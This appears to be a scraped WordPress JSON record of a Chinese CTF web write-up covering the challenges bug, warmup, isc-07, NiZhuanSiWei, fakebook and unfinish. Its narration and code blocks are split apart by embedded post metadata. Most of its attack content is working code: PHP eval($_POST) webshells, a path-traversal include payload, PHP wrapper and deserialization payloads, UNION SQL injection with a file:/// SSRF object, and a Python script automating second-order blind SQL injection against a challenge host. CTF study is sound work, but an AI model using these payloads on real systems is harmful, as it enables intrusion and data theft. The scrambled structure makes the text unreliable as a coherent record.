![\"\"](\"http:\/\/101.201.119.158\/wp-content\/uploads\/2025\/05\/image-8.png\")
<\/div><\/figure>\n\n\n\n\u7136\u540e\u7b2c\u4e8c\u4e2a\u70b9\u4e0d\u5f00\uff0c\u53d1\u73b0\u4e0d\u662fadmin,\u7136\u540e\u53ef\u4ee5\u6539\u4e0b\u5bc6\u7801\uff0c\u770b\u770b\u6709\u6ca1\u6709\u903b\u8f91\u6f0f\u6d1e\uff0c\u53d1\u73b0\u5728bp\u91cc\u9762\u5e76\u6ca1\u6709\uff0c\u6ca1\u6709\u53d1\u73b0\u5173\u4e8e\u6211\u7528\u6237\u540d\u7684\u5730\u65b9\uff0c\u6211\u770b\u770b\u627e\u56de\u5bc6\u7801<\/p>\n\n\n\n \u53d1\u73b0\u6709\u4e1c\u897f\uff0c\u5728bp\u76f4\u63a5\u6539\u5305<\/p>\n\n\n\n \u76f4\u63a5\u6539admin\uff0c\u53d1\u73b0ip\u9519\u8bef<\/p>\n\n\n\n ip\u9519\u8bef\uff0c\u76f4\u63a5\u52a0X-Forwarded-For:127.0.0.1<\/p>\n\n\n\n filename \u6587\u4ef6\u7ba1\u7406 –>>do=upload\uff0c\u53d1\u73b0\u662f\u6587\u4ef6\u4e0a\u4f20<\/p>\n\n\n\n \u6587\u4ef6\u4e0a\u4f20\uff0c\u6539\u6210jpg\u7136\u540e\u77ed\u6807\u7b7e\u7ed5\u8fc7\uff0c\u53d1\u73b0\u8fd8\u662fyou know what i want\uff0c\u7136\u540e\u5728\u7f51\u4e0a\u770b\u4e86\u770b\u53d1\u73b0\u672c\u9898\u7684\u8003\u70b9\uff0c\u5229\u7528JavaScript\u6267\u884cphp\u4ee3\u7801\uff08\u6b63\u5e38\u7684php\u4ee3\u7801\u4f1a\u88ab\u68c0\u6d4b\u5230\uff0c\u6240\u4ee5\u5c31\u8003\u8651\u7528JavaScript\u6765\u6267\u884c\uff09<\/p>\n\n\n\n \u8003\u5bdf\u70b9\uff1a\u4e2d\u95f4\u4ef6\u6f0f\u6d1e+php\u4ee3\u7801<\/p>\n\n\n\n \u7136\u540e\u53bb\u8bbf\u95eehint.php\u8fd9\u4e2a\u6587\u4ef6\uff0c\u53d1\u73b0flag in ffffllllaaaagggg \u800c\u770b\u89c1\u8fd9\u4e2a\u662fApache \u7a81\u7136\u60f3\u5230\u5b58\u5728\u76ee\u5f55\u7a7f\u8d8a<\/p>\n\n\n\n \u4f46\u662f\u53c8\u8981\u5339\u914d\u767d\u540d\u5355\u6240\u4ee5\u8981\u5148=source.php?\u76ee\u5f55<\/p>\n\n\n\n payload\u76f4\u63a5\u6253\u51fa\u6765<\/p>\n\n\n\n \u8003\u5bdf\u70b9\uff1alinux\u76ee\u5f55\u7ed3\u6784\u7279\u6027<\/p>\n\n\n\n \u6253\u5f00\u4e09\u4ef6\u5957\uff0c\u7136\u540e\u968f\u4fbf\u70b9\u70b9\uff0c\u53d1\u73b0\u9879\u76ee\u7ba1\u7406\u53ef\u4ee5\u70b9\u5f00\uff0c\u7136\u540e\u53d1\u73b0\u6709\u4e2a\u53ef\u4ee5\u67e5\u770b\u6e90\u4ee3\u7801\uff0c\u70b9\u5f00\u770b\u770b\u968f\u4fbf\u5ba1\u8ba1\u4e00\u4e0b<\/p>\n\n\n\n \u5148\u5c1d\u8bd5\u8fc7\u6ee4\u4e00\u4e0bfloatval\u8fd9\u4e2a\u51fd\u6570\uff0c\u8fd4\u56de\u9879\u76ee\u7ba1\u7406\uff0c\u5e76\u4e14\u4f20id=1-9\u548cpage=flag.php,\u53d1\u73b0name:admin\uff0c\u7136\u540e\u5c31\u53ef\u4ee5POST\u4f20\u5199\u6587\u4ef6\u4e86\uff0c\u8fd9\u91cc\u5229\u7528Linux\u7684\u4e00\u4e2a\u76ee\u5f55\u7ed3\u6784\u7279\u6027\u3002\u6211\u4eec\u9012\u5f52\u7684\u57281.php\u6587\u4ef6\u5939\u4e2d\u518d\u521b\u5efa2.php\uff0c\u8bbf\u95ee1.php\/2.php\/\u2026\u8fdb\u5165\u7684\u662f1.php\u6587\u4ef6\u5939\uff0c\u4e8e\u662fPOST\u4f20<\/p>\n\n\n\n \u76f4\u63a5\u8681\u5251\u8fde\u63a5\u3002<\/p>\n\n\n\n \u8003\u5bdf\u70b9\uff1aphp\u4f2a\u534f\u8bae+php\u53cd\u5e8f\u5217\u5316<\/p>\n\n\n\n \u6253\u5f00\u53d1\u73b0\u6e90\u7801<\/p>\n\n\n\n \u5148\u7b80\u5355\u8bb2\u4e00\u4e0bphp\u4f2a\u534f\u8bae<\/p>\n\n\n\n \u5148\u5bf9text\u8fd9\u4e2a\u53c2\u6570\u8fdb\u884cdata\u5199\u5165\u64cd\u4f5c\uff0c\u7136\u540e\u5bf9file\u8fd9\u4e2a\u53c2\u6570\u8bfb\u53d6\u4e00\u4e0buseless.php\u8fd9\u4e2a\u6587\u4ef6<\/p>\n\n\n\n \u56de\u663e\u51fa\u6765<\/p>\n\n\n\n payload\u76f4\u63a5\u6253<\/p>\n\n\n\n \u7136\u540e\u770b\u89c1\u56de\u663e\uff0c\u8bb0\u5f97\u67e5\u770b\u6e90\u4ee3\u7801<\/p>\n\n\n\n \u8003\u5bdf\u70b9\uff1asql\u6ce8\u5165+\u53cd\u5e8f\u5217\u5316+\u6587\u4ef6\u76ee\u5f55<\/p>\n\n\n\n \u6253\u5f00\u53d1\u73b0\u5b58\u5728\u767b\u5f55\u9875\u9762\uff0c\u968f\u4fbf\u6ce8\u518c\u8fdb\u53bb\u770b\u770b\uff0c\u7136\u540e\u70b9\u51fb\u4e2a\u4eba\u7528\u6237\uff0c\u53d1\u73b0\u9875\u9762\u662fview.php?no=1,\u989d\uff0c1\uff0c\u6d4b\u8bd5\u4e00\u4e0b\u662f\u4e0d\u662fSQL\u6ce8\u5165\uff0c\u8f93\u5165no=1 or 1=1–+\uff0c\u8fd8\u771f\u7684\u6709\u56de\u663e,\u4f46\u662f\u4e00\u76f4\u5728\u6d4b\u8bd5\u53d1\u73b0\u600e\u4e48\u90fd\u51fa\u4e0d\u6765\u554a\uff0c\u7136\u540e\u5c31\u4e09\u4ef6\u5957\u770b\u770b\u8fd8\u6709\u6ca1\u6709\u5176\u4ed6\u7ebf\u7d22\uff0c\u53d1\u73b0robots.txt\u6587\u4ef6<\/p>\n\n\n\n \u54e6\uff0c\u6211\u521a\u624d\u662f111.com\uff0c\u9519\u4e86\uff0c\u7136\u540e\u73b0\u5728\u518d\u770b\u770b<\/p>\n\n\n\n \u7136\u540e\u770b\u89c1\u8fd9\u4e2aphp\u8def\u5f84\uff0c\u662f\/var\/www\/html\/view.php–>flag in \/var\/www\/html\/flag.php<\/p>\n\n\n\n \u7136\u540e\u770bdata\u662f\u7ecf\u8fc7\u5e8f\u5217\u5316\u7684\uff0c\u4f7f\u7528\u53cd\u5e8f\u5217\u5316+php\u4f2a\u534f\u8bae\u8bfb\u53d6flag.php\u6587\u4ef6<\/p>\n\n\n\n \u9875\u9762\u52a0\u8f7d\u65f6\u4f1a\u53cd\u5e8f\u5217\u5316data\u5b57\u6bb5\uff0c\u89e6\u53d1getBlogContents()\u65b9\u6cd5\u8bfb\u53d6flag.php\u3002<\/p>\n\n\n\n \u7136\u540e\u67e5\u770b\u6e90\u4ee3\u7801\u53d1\u73b0base64\u52a0\u5bc6\uff0c\u8fdb\u884c\u89e3\u5bc6\u51fa\u6765flag<\/p>\n\n\n\n \u8003\u5bdf\u70b9\uff1asql\u6ce8\u5165(\u4e8c\u6b21\u6ce8\u5165)<\/p>\n\n\n\n \u5b9e\u73b0\u70b9\u5f00\u53d1\u73b0\u662f\u767b\u5f55\u9875\u9762\uff0c\u7136\u540e\u8fdb\u884c\u4e09\u4ef6\u5957\u770b\u770b\uff0c\u53d1\u73b0\u5b58\u5728\u6ce8\u518c\u9875\u9762\uff0c\u7136\u540e\u6ce8\u518c\u8fdb\u53bb\u770b\u770b\uff0c\u53d1\u73b0\u597d\u50cf\u5b58\u5728\u6ce8\u5165\u70b9\uff0c\u767b\u4e0a\u53bb\u53d1\u73b0\u6211\u4eec\u7684\u7528\u6237\u540d\u51fa\u73b0\u5728\u4e86\u754c\u9762\u4e0a\uff0c\u8fd9\u4e2a\u5c31\u6bd4\u8f83\u7b26\u5408\u4e8c\u6b21\u6ce8\u5165\u7684\u70b9\u4e86,\u7136\u540e\u5c31\u8981\u770b\u770b\u67e5\u8be2\u8bed\u53e5\u4e86<\/p>\n\n\n\n \u7136\u540e\u6ce8\u518c\u53d1\u73b0\u7528\u6237\u540d\u662f119\uff0c\u4e5f\u5c31\u662f’w’,\u53d1\u73b0\u6210\u529f\u6ce8\u5165\uff0c\u7136\u540e\u5c31\u4f7f\u7528substr\u8fdb\u884c\u622a\u53d6\u5b57\u7b26\u4e32\u4e86\uff0c\u4f46\u662f\u53d1\u73b0<\/p>\n\n\n\n \u88abban\u4e86\uff0c\u55ef\uff0c\u7136\u540e\u4f7f\u7528\u5b57\u5178\u770b\u770b\u6709\u6ca1\u6709\u4ec0\u4e48\u6ca1\u6709\u88abban\uff0c\u7f51\u7ad9\u628a\u201c \uff0c \u548c information\u201dban\u6389\u4e86\uff0c<\/p>\n\n\n\n \u7528sys\u5e93\u8fdb\u884c\u6ce8\u5165\u3002\u6ce8\u5165\u8bed\u53e5\u5982\u4e0b\uff1a<\/p>\n\n\n\n \u7136\u540e\u4e00\u76f4\u62a5\u9519\u51fa\u4e0d\u6765\uff0c\u5c31\u76f4\u63a5\u770b\u4ed6flag\u8fd9\u4e2a\u8868\u91cc\u9762\u7684\u6570\u636e\u4e86<\/p>\n\n\n\n \u7136\u540e\u5c31\u51fa\u6765flag(\u771f\u7684\u8981\u5b66python\u7684\u811a\u672c\u4e86\uff0c\u554a\u554a\u554a\uff01\uff01\uff01)<\/p>\n","protected":false},"excerpt":{"rendered":" \u653b\u9632\u4e16\u754c-bug \u8003\u5bdf\u70b9\uff1a\u63d0\u6743\u52a0\u6587\u4ef6\u4e0a\u4f20 \u9996\u5148\u6253\u5f00\u662f\u767b\u5f55\u6846\uff0c\u7136\u540e\u5e94\u8be5\u662f\u7206\u7834\u4e0d\u51fa\u6765\u7684\uff0c\u7136\u540e\u5148\u6ce8\u518c\u8fdb\u53bb\u770b\u770b\uff0c\u8fdb\u53bb\u53d1 […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[1],"tags":[],"class_list":["post-51","post","type-post","status-publish","format-standard","hentry","category-ctf"],"_links":{"self":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/51","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=51"}],"version-history":[{"count":13,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/51\/revisions"}],"predecessor-version":[{"id":82,"href":"http:\/\/101.201.119.158\/index.php?rest_route=\/wp\/v2\/posts\/51\/revisions\/82"}],"wp:attachment":[{"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=51"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=51"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/101.201.119.158\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=51"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}![\"\"](\"http:\/\/101.201.119.158\/wp-content\/uploads\/2025\/05\/image-9-1024x420.png\")
<\/div><\/figure>\n\n\n\n<script language=\"php\"> @eval($_POST['1']); <\/script> \u76f4\u63a5\u51fa\u6765flag<\/pre>\n\n\n\n
\u653b\u9632\u4e16\u754c\u2014\u2014warmup<\/h2>\n\n\n\n
<?php\n highlight_file(__FILE__);\n class emmm\n {\n public static function checkFile(&$page)\n {\n $whitelist = [\"source\"=>\"source.php\",\"hint\"=>\"hint.php\"];\/\/\u8bbe\u7f6e\u767d\u540d\u5355\n if (! isset($page) || !is_string($page)) {\n echo \"you can't see it\";\n return false;\n }\/\/\u5982\u679c\u4f20\u7684\u662f\u7a7a\u548c\u5b57\u7b26\u4e32\uff0c\u8fd4\u56de\u9519\u8bef\n\n if (in_array($page, $whitelist)) {\n return true;\n }\/\/\u5982\u679c\u5339\u914d\u767d\u540d\u5355\u91cc\u9762\u7684\uff0c\u8fd4\u56detrue\n\n $_page = mb_substr(\n $page,\n 0,\n mb_strpos($page . '?', '?')\n );\/\/\u622a\u53d6page 0 ?\n if (in_array($_page, $whitelist)) {\n return true;\n }\/\/\u518d\u6b21\u5339\u914d\n\n $_page = urldecode($page);\n $_page = mb_substr(\n $_page,\n 0,\n mb_strpos($_page . '?', '?')\n );\/\/\u518d\u6b21\u622a\u53d6\n if (in_array($_page, $whitelist)) {\n return true;\n }\n echo \"you can't see it\";\n return false;\n }\n }\n\n if (! empty($_REQUEST['file'])\n && is_string($_REQUEST['file'])\n && emmm::checkFile($_REQUEST['file'])\n ) {\n include $_REQUEST['file'];\n exit;\n } else {\n echo \"<br><img src=\\\"https:\/\/i.loli.net\/2018\/11\/01\/5bdb0d93dc794.jpg\\\" \/>\";\n } \n?><\/code><\/pre>\n\n\n\nPHP \u7684 include() \u5728\u89e3\u6790\u8def\u5f84\u65f6\uff0c\u5982\u679c\u6587\u4ef6\u540d\u662f \u5408\u6cd5\u767d\u540d\u5355\u6587\u4ef6 + ?PATH\uff0c\u4e00\u4e9b\u670d\u52a1\u5668\uff08\u5c24\u5176\u662f Apache + PHP\uff09\u4f1a\u5c06 ?PATH \u540e\u7684\u8def\u5f84\u62fc\u63a5\u5230\u5b9e\u9645\u6587\u4ef6\u8def\u5f84\u4e0a\uff0c\u4ece\u800c\u9020\u6210\u8def\u5f84\u7a7f\u8d8a\u3002<\/pre>\n\n\n\n
file=source.php%3F..\/..\/..\/..\/..\/..\/ffffllllaaaagggg<\/pre>\n\n\n\n
\u653b\u9632\u4e16\u754c\u2014\u2014isc-07<\/h2>\n\n\n\n
<!DOCTYPE html>\n<html>\n <head>\n <meta charset=\"utf-8\">\n <title>cetc7<\/title>\n <\/head>\n <body>\n <?php\n session_start();\n\n if (!isset($_GET[page])) {\n show_source(__FILE__);\n die();\n }\n\n if (isset($_GET[page]) && $_GET[page] != 'index.php') {\n include('flag.php'); \/\/\u67e5\u770b\u6709\u6ca1\u6709page\u8fd9\u4e2a\u53c2\u6570\uff0c\u5982\u679c\u6709\uff0c\u5982\u679c\u4e0d\u7b49\u4e8eindex.php\uff0c\u5219\u5305\u542bflag.php\uff0c\u53cd\u4e4b\u5219\u4ee4page=flag.php\uff0c\u76f4\u63a5\u8df3\u8f6cflag.php\n }else {\n header('Location: ?page=flag.php');\n }\n\n ?>\n\n <form action=\"#\" method=\"get\">\n page : <input type=\"text\" name=\"page\" value=\"\">\n id : <input type=\"text\" name=\"id\" value=\"\">\n <input type=\"submit\" name=\"submit\" value=\"submit\">\n <\/form>\n <br \/>\n <a href=\"index.phps\">view-source<\/a>\n\n <?php\n if ($_SESSION['admin']) {\/\/\u524d\u63d0 session['admin']\n $con = $_POST['con'];\n $file = $_POST['file'];\n $filename = \"backup\/\".$file;\n\n if(preg_match('\/.+\\.ph(p[3457]?|t|tml)$\/i', $filename)){\/\/\u5bf9filename\u8fd9\u4e2a\u53c2\u6570\u8fdb\u884c\u6b63\u5219\u5339\u914d\uff0c\u8fc7\u6ee4\u5371\u9669\u6587\u4ef6\n die(\"Bad file extension\");\n }else{\n chdir('uploaded');\/\/\u5982\u679c\u6ca1\u6709\u5339\u914d\u5230\uff0c\u5219\u6587\u4ef6\u5305\u542b\u5230uploaded\/backup\u8fd9\u4e2a\u76ee\u5f55\u4e0b\u9762\n $f = fopen($filename, 'w');\n fwrite($f, $con);\n fclose($f);\n }\n }\n ?>\n\n <?php\n if (isset($_GET[id]) && floatval($_GET[id]) !== '1' && substr($_GET[id], -1) === '9') {\n include 'config.php'; \/\/\u8981\u4f20id\u8fd9\u4e2a\u53c2\u6570\uff0c\u5e76\u4e14id!=1,\u800c\u4e14id\u7684\u6700\u540e\u9762\u4e00\u4f4d\u4e3a9\uff0cfloatval\u8fd9\u4e2a\u51fd\u6570\u4f1a\u5bf9\u5b57\u7b26\u8fdb\u884c\u622a\u65ad\n $id = mysql_real_escape_string($_GET[id]);\n $sql=\"select * from cetc007.user where id='$id'\";\n $result = mysql_query($sql);\n $result = mysql_fetch_object($result);\n } else {\n $result = False;\n die();\n }\n\n if(!$result)die(\"<br >something wae wrong ! <br>\");\n if($result){\n echo \"id: \".$result->id.\"<\/br>\";\n echo \"name:\".$result->user.\"<\/br>\";\n $_SESSION['admin'] = True; \/\/\u4e13\u95e8\u7528\u6765\u6ee1\u8db3\u8fd9\u4e2a\u524d\u63d0\u7684\n }\n ?>\n\n <\/body>\n<\/html><\/code><\/pre>\n\n\n\ncon=<?php @eval($_POST[cmd]);?>&file=1.php\/2.php\/..<\/code><\/pre>\n\n\n\n![\"\"](\"http:\/\/101.201.119.158\/wp-content\/uploads\/2025\/05\/image-10.png\")
<\/div><\/figure>\n\n\n\n[ZJCTF 2019]NiZhuanSiWei<\/h2>\n\n\n\n
<?php \n$text = $_GET[\"text\"];\n$file = $_GET[\"file\"];\n$password = $_GET[\"password\"];\nif(isset($text)&&(file_get_contents($text,'r')===\"welcome to the zjctf\")){\/\/\u68c0\u67e5\u6709\u6ca1\u6709text\u8fd9\u4e2a\u53c2\u6570\uff0c\u5e76\u4e14\u5c06$text\u4f20\u5165r\u8fd9\u4e2a\u5b57\u7b26\u4e32\u5e76\u4e14===welcome to the zjctf\n echo \"<br><h1>\".file_get_contents($text,'r').\"<\/h1><\/br>\";\/\/\u8f93\u51fa\u4f20\u5165\u7684\u5b57\u7b26\u4e32\n if(preg_match(\"\/flag\/\",$file)){\/\/\u68c0\u67e5file\u8fd9\u4e2a\u53c2\u6570\u91cc\u9762\u6709\u6ca1\u6709flag\u8fd9\u4e2a\u5b57\u7b26\u4e32\n echo \"Not now!\";\n exit(); \n }else{\n include($file); \/\/useless.php \u5b58\u5728useless.php\u8fd9\u4e2a\u6587\u4ef6\n $password = unserialize($password);\/\/\u8fdb\u884c\u53cd\u5e8f\u5217\u64cd\u4f5c\n echo $password;\n }\n}\nelse{\n highlight_file(__FILE__);\n}\n?><\/code><\/pre>\n\n\n\nphp\u4f2a\u534f\u8bae(\u7b80\u5355\u7248\u672c)\nphp:\/\/filter:\u53ef\u4ee5\u83b7\u53d6\u6307\u5b9a\u6587\u4ef6\u6e90\u7801\nphp:\/\/input\u53ef\u4ee5\u8bbf\u95ee\u8bf7\u6c42\u7684\u539f\u59cb\u6570\u636e\u7684\u53ea\u8bfb\u6d41\uff0c\u5c06post\u8bf7\u6c42\u7684\u6570\u636e\u5f53\u4f5cphp\u4ee3\u7801\u6267\u884c\u3002\ndata:\/\/ \u540c\u6837\u7c7b\u4f3c\u4e0ephp:\/\/input\uff0c\u53ef\u4ee5\u8ba9\u7528\u6237\u6765\u63a7\u5236\u8f93\u5165\u6d41\uff0c\u5f53\u5b83\u4e0e\u5305\u542b\u51fd\u6570\u7ed3\u5408\u65f6\uff0c\u7528\u6237\u8f93\u5165\u7684data:\/\/\u6d41\u4f1a\u88ab\u5f53\u4f5cphp\u6587\u4ef6\u6267\u884c\u3002\u4ece\u800c\u5bfc\u81f4\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\nzip:\/\/ \u53ef\u4ee5\u8bbf\u95ee\u538b\u7f29\u5305\u91cc\u9762\u7684\u6587\u4ef6\u3002\u5f53\u5b83\u4e0e\u5305\u542b\u51fd\u6570\u7ed3\u5408\u65f6\uff0czip:\/\/\u6d41\u4f1a\u88ab\u5f53\u4f5cphp\u6587\u4ef6\u6267\u884c\u3002\u4ece\u800c\u5b9e\u73b0\u4efb\u610f\u4ee3\u7801\u6267\u884c\u3002\nphar:\/\/\u4e2d\u76f8\u5bf9\u8def\u5f84\u548c\u7edd\u5bf9\u8def\u5f84\u90fd\u53ef\u4ee5\u4f7f\u7528\uff0c\u4e0ezip\u5dee\u4e0d\u591a<\/code><\/pre>\n\n\n\ntext=data:\/\/text\/plain,welcome to the zjctf&file=php:\/\/filter\/convert.base64-encode\/resource=useless.php<\/code><\/pre>\n\n\n\n<?php \nclass Flag{ \/\/flag.php \n public $file; \n public function __tostring(){ \n if(isset($this->file)){ \n echo file_get_contents($this->file); \n echo \"<br>\";\n return (\"U R SO CLOSE !\/\/\/COME ON PLZ\");\n } \n } \n} \n?> \u53cd\u5e8f\u5217\u5316\u76f4\u63a5\u6253\u51fa\u6765\n$a = new Flag();\n$a -> file = 'flag.php';\necho serialize($a);<\/code><\/pre>\n\n\n\ntext=data:\/\/text\/plain,welcome to the zjctf&file=useless.php&password=O:4:\"Flag\":1:{s:4:\"file\";s:8:\"flag.php\";}<\/code><\/pre>\n\n\n\nfakebook<\/h2>\n\n\n\n
<?php\nclass UserInfo\n{\n public $name = \"\";\n public $age = 0;\n public $blog = \"\";\n\n public function __construct($name, $age, $blog)\n {\n $this->name = $name;\n $this->age = (int)$age;\/\/\u5f3a\u5236\u8f6cint\n $this->blog = $blog;\n }\n\n function get($url)\n {\n $ch = curl_init();\n\n curl_setopt($ch, CURLOPT_URL, $url);\n curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);\n $output = curl_exec($ch);\n $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);\/\/\u53ef\u4ee5\u8fdb\u884c\u4e00\u4e9b\u4f2a\u534f\u8bae\u8bfb\u53d6\n if($httpCode == 404) {\n return 404;\n }\n curl_close($ch);\n\n return $output;\n }\n\n public function getBlogContents ()\n {\n return $this->get($this->blog);\n }\n\n public function isValidBlog ()\n {\n $blog = $this->blog;\n return preg_match(\"\/^(((http(s?))\\:\\\/\\\/)?)([0-9a-zA-Z\\-]+\\.)+[a-zA-Z]{2,6}(\\:[0-9]+)?(\\\/\\S*)?$\/i\", $blog);\n }\/\/\u5bf9blog\u8fdb\u884c\u6b63\u5219\u5339\u914d\u5728blog\u4e2d\u8981\u5339\u914d\u5230https:\/\/\n\n}<\/code><\/pre>\n\n\n\nno=1 order by 1,2,3,4--+\nno=-1\/**\/union\/**\/ select \/**\/1,2,3,4--+\/\/\u53d1\u73b0\u57282\u90a3\u91cc\u6709\u56de\u663e\nno=-1\/**\/union\/**\/ select \/**\/1,database(),3,4--+\n-1 \/**\/union \/**\/ select\/**\/ 1,group_concat(table_name) ,3,4 from information_schema.tables where table_schema=database()\n-1 \/**\/union \/**\/ select\/**\/ 1,group_concat(column_name) ,3,4 from information_schema.columns where table_schema=\"fakebook\"\n-1 \/**\/union \/**\/ select\/**\/ 1,group_concat(no,'~',data) ,3,4 from fakebook.users\n-1\/**\/union\/**\/select\/**\/1,group_concat(no,'@@@',data),3,4 from users--+\n\u56de\u663e1@@@O:8:\"UserInfo\":3:{s:4:\"name\";s:1:\"1\";s:3:\"age\";i:18;s:4:\"blog\";s:15:\"https:\/\/wea.com\";}<\/code><\/pre>\n\n\n\n<?php\nclass UserInfo {\n public $name = \"test\";\n public $age = 0;\n public $blog = \"file:\/\/\/var\/www\/html\/flag.php\";\n}\necho serialize(new UserInfo);<\/code><\/pre>\n\n\n\nno=-1 \/**\/union \/**\/ select \/**\/1,2 ,3,'O:8:\"UserInfo\":3:{s:4:\"name\";s:1:\"1\";s:3:\"age\";i:18;s:4:\"blog\";s:29:\"file:\/\/\/var\/www\/html\/flag.php\";}'<\/code><\/pre>\n\n\n\n\u653b\u9632\u4e16\u754c\u2014\u2014unfinish<\/h2>\n\n\n\n
\/\/\u6ce8\u518c\u7528\u6237\ninsert into tables values('$email','$username','$password')\ninsert into tables values('$email','0' +(select ascii(database())) +'0','$password')\n<\/code><\/pre>\n\n\n\n0'+(select ascii(substr (database(),2,1)))+'0<\/code><\/pre>\n\n\n\n\u5148\u6765\u8fdb\u884c\u8868\u540d\u7684\u6ce8\u5165\uff1a\n0'+\uff08select ascii(substr(table_name from 6 for 1 )) from sys.x$schema_table_statistics limit 1\uff09+'0<\/code><\/pre>\n\n\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n# \u8be5\u51fd\u6570\u901a\u8fc7SQL\u6ce8\u5165\u83b7\u53d6\u5f53\u524d\u6570\u636e\u5e93\u540d\ndef select_database():\n database = \"\" # \u5b58\u50a8\u83b7\u53d6\u5230\u7684\u6570\u636e\u5e93\u540d\n for i in range(100): # \u6700\u591a\u5c1d\u8bd5100\u4e2a\u5b57\u7b26\n # \u6784\u9020\u6ce8\u518c\u6570\u636e\uff0c\u7528\u6237\u540d\u5305\u542bSQL\u6ce8\u5165 payload\n data_register = {\n \"email\": \"%d@qq.com\" % (i),\n # \u5173\u952e\u6ce8\u5165\u70b9\uff1a\u901a\u8fc7 ASCII \u7801\u9010\u5b57\u7b26\u83b7\u53d6\u6570\u636e\u5e93\u540d\n \"username\": f\"0'+(select ascii(substr(database()from {i + 1} for 1)))+'0\",\n \"password\": \"%d\" % (i)\n }\n # \u53d1\u9001\u6ce8\u518c\u8bf7\u6c42\n register = requests.post(url=\"http:\/\/223.112.5.141:64427\/register.php\",\n data=data_register)\n # \u6784\u9020\u767b\u5f55\u6570\u636e\n data_login = {\n \"email\": \"%d@qq.com\" % (i),\n \"password\": \"%d\" % (i)\n }\n # \u53d1\u9001\u767b\u5f55\u8bf7\u6c42\n login = requests.post(url=\"http:\/\/223.112.5.141:64427\/login.php\",\n data=data_login)\n html = login.text # \u83b7\u53d6\u767b\u5f55\u540e\u7684\u9875\u9762\u5185\u5bb9\n soup = BeautifulSoup(html, 'html.parser') # \u89e3\u6790HTML\n getUsername = soup.find_all('span')[0] # \u83b7\u53d6\u7b2c\u4e00\u4e2aspan\u6807\u7b7e\u5185\u5bb9\uff08\u5305\u542b\u6ce8\u5165\u7ed3\u679c\uff09\n username = getUsername.text # \u63d0\u53d6\u6587\u672c\n o = int(username) # \u8f6c\u6362\u4e3a\u6574\u6570\uff08\u5373 ASCII \u7801\u503c\uff09\n if o == 0: # \u5982\u679c\u4e3a0\uff0c\u8868\u793a\u6ca1\u6709\u66f4\u591a\u5b57\u7b26\n break\n database += chr(int(username)) # \u5c06 ASCII \u7801\u8f6c\u6362\u4e3a\u5b57\u7b26\u5e76\u6dfb\u52a0\u5230\u7ed3\u679c\u4e2d\n print(database) # \u6253\u5370\u5f53\u524d\u83b7\u53d6\u5230\u7684\u6570\u636e\u5e93\u540d\n return database # \u8fd4\u56de\u5b8c\u6574\u7684\u6570\u636e\u5e93\u540d\n\n# \u8be5\u51fd\u6570\u901a\u8fc7SQL\u6ce8\u5165\u83b7\u53d6flag\u8868\u4e2d\u7684\u5185\u5bb9\ndef select_flag():\n flag = \"\" # \u5b58\u50a8\u83b7\u53d6\u5230\u7684flag\n for i in range(100): # \u6700\u591a\u5c1d\u8bd5100\u4e2a\u5b57\u7b26\n # \u6784\u9020\u6ce8\u518c\u6570\u636e\uff0c\u7528\u6237\u540d\u5305\u542bSQL\u6ce8\u5165 payload\n data_register = {\n \"email\": \"%d@qqq.com\" % (i),\n # \u5173\u952e\u6ce8\u5165\u70b9\uff1a\u901a\u8fc7 ASCII \u7801\u9010\u5b57\u7b26\u83b7\u53d6flag\u8868\u4e2d\u7684\u6570\u636e\n \"username\": f\"0'+ascii(substr((select * from flag) from {i + 1} for 1))+'0\",\n \"password\": \"%d\" % (i)\n }\n # \u53d1\u9001\u6ce8\u518c\u8bf7\u6c42\n register = requests.post(url=\"http:\/\/223.112.5.141:64427\/register.php\",\n data=data_register)\n # \u6784\u9020\u767b\u5f55\u6570\u636e\n data_login = {\n \"email\": \"%d@qqq.com\" % (i),\n \"password\": \"%d\" % (i)\n }\n # \u53d1\u9001\u767b\u5f55\u8bf7\u6c42\n login = requests.post(url=\"http:\/\/223.112.5.141:64427\/login.php\",\n data=data_login)\n html = login.text # \u83b7\u53d6\u767b\u5f55\u540e\u7684\u9875\u9762\u5185\u5bb9\n soup = BeautifulSoup(html, 'html.parser') # \u89e3\u6790HTML\n getUsername = soup.find_all('span')[0] # \u83b7\u53d6\u7b2c\u4e00\u4e2aspan\u6807\u7b7e\u5185\u5bb9\n username = getUsername.text # \u63d0\u53d6\u6587\u672c\n o = int(username) # \u8f6c\u6362\u4e3a\u6574\u6570\uff08ASCII \u7801\u503c\uff09\n if o == 0: # \u5982\u679c\u4e3a0\uff0c\u8868\u793a\u6ca1\u6709\u66f4\u591a\u5b57\u7b26\n break\n flag += chr(int(username)) # \u5c06 ASCII \u7801\u8f6c\u6362\u4e3a\u5b57\u7b26\u5e76\u6dfb\u52a0\u5230\u7ed3\u679c\u4e2d\n print(flag) # \u6253\u5370\u5f53\u524d\u83b7\u53d6\u5230\u7684flag\u5185\u5bb9\n\n# \u6267\u884c\u51fd\u6570\u5e76\u6253\u5370\u7ed3\u679c\nprint(select_database())\nprint(select_flag())<\/code><\/pre>\n\n\n\n